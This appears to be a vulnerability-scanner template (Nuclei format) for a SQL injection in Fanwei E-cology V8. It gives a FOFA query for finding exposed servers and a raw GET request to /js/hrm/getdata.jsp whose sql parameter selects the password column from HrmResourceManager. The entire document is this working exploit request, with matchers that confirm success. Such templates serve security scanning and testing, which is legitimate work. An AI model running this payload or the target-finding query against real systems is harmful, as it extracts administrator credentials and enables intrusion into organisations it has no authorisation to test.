id: fanwei-e-cology-v8-sqli

info:
  name: Fanwei E-cology V8 Sqli
  author: zp857
  severity: high
  reference: https://moresec.yuque.com/iixlqz/wnv3e6/muc8pk
  tags: fanwei-e-cology,sqli
  metadata:
    fofa-query: 'body="泛微协同" || body="wev8" || body="ecology" || body="e-cology" || body="wui/index.html" || header="ecology_JSessionId" || icon_hash="1578525679"'

requests:
  - raw:
      - |
        GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "ecology_JSessionid"